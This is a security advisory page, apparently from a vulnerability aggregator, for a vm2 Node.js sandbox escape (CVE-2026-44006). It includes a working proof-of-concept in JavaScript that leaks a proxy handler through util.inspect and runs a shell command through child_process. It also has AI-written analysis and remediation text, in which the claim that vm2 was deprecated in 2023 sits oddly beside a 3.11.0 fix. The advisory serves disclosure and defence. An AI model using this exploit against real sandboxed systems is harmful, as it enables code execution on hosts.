vm2 CVE-2026-44006
CRITICALSeverity by source
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Primary rating from Vendor (https://github.com/patriksimek/vm2).
CVSS VectorVendor: https://github.com/patriksimek/vm2
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionCVE.org
Summary
It is possible to reach BaseHandler.getPrototypeOf, which can be used to get arbitrary prototypes
Details
https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658
BaseHandler can be reached via util.inspect (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)
PoC
let obj = {
subarray: Buffer.prototype.inspect,
slice: Buffer.prototype.slice,
hexSlice: () => '',
};
let sym;
obj.slice(10, {
showHidden: true,
showProxy: true,
depth: 10,
stylize(a) {
const handler = this.seen && this.seen[1];
if (handler && handler.getPrototypeOf) {
gP = handler.getPrototypeOf;
HObjectProto = gP(gP(gP(gP(Buffer))));
HObject = HObjectProto.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
}
return a;
},
});
obj = {
[sym]: (depth, opt, inspect) => {
inspect.constructor('return process')()
.getBuiltinModule('child_process')
.execSync('id', { stdio: 'inherit' });
},
valueOf: undefined,
constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});Impact
Sandbox Escape -> RCE
AnalysisAI
Prototype chain manipulation in vm2 Node.js sandbox library enables complete sandbox escape and remote code execution via util.inspect handler leakage. Attackers can exploit BaseHandler.getPrototypeOf through crafted objects to access host process primitives and execute arbitrary system commands. Public exploit code exists (vendor-published PoC demonstrates child_process.execSync execution). Fixed in vm2 version 3.11.0 alongside 12 other critical sandbox escape vulnerabilities in coordinated security release.
Technical ContextAI
vm2 is a JavaScript sandbox library for Node.js that isolates untrusted code execution. The vulnerability exploits the bridge mechanism between sandboxed and host realms. By chaining Buffer.prototype methods with custom objects containing a malicious stylize callback passed to util.inspect, attackers reach the internal BaseHandler's getPrototypeOf trap. This allows traversing the prototype chain to obtain host-realm Object constructor, extracting internal symbols from Buffer.prototype, then crafting objects with symbol-keyed properties that execute when WebAssembly.compileStreaming triggers internal inspection. The exploit abuses CWE-94 Improper Control of Generation of Code, specifically prototype pollution combined with constructor access to break out of the VM's realm isolation and invoke Node.js child_process APIs directly.
RemediationAI
Upgrade to vm2 version 3.11.0 immediately, as confirmed in the vendor release notes at https://github.com/patriksimek/vm2/releases/tag/v3.11.0. This coordinated security release patches 13 distinct sandbox escape vulnerabilities including this prototype chain manipulation issue. No workarounds exist that maintain sandbox integrity - the underlying bridge architecture required fundamental redesign. If immediate upgrade is impossible, stop executing untrusted code in vm2 entirely and migrate to isolated-vm or OS-level sandboxing (Docker containers, VMs, gVisor). Disabling specific Node.js features is insufficient because multiple independent escape vectors existed. The new 3.11.0 release also introduces bufferAllocLimit configuration to mitigate heap exhaustion DoS attacks - review and configure this limit based on your trust model. Note that vm2 maintainers later deprecated the entire project in 2023 due to ongoing security challenges, recommending migration to isolated-vm for production use cases requiring untrusted code execution.
Same weakness CWE-94 – Code Injection
View allSame technique Code Injection
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-qcp4-v2jj-fjx8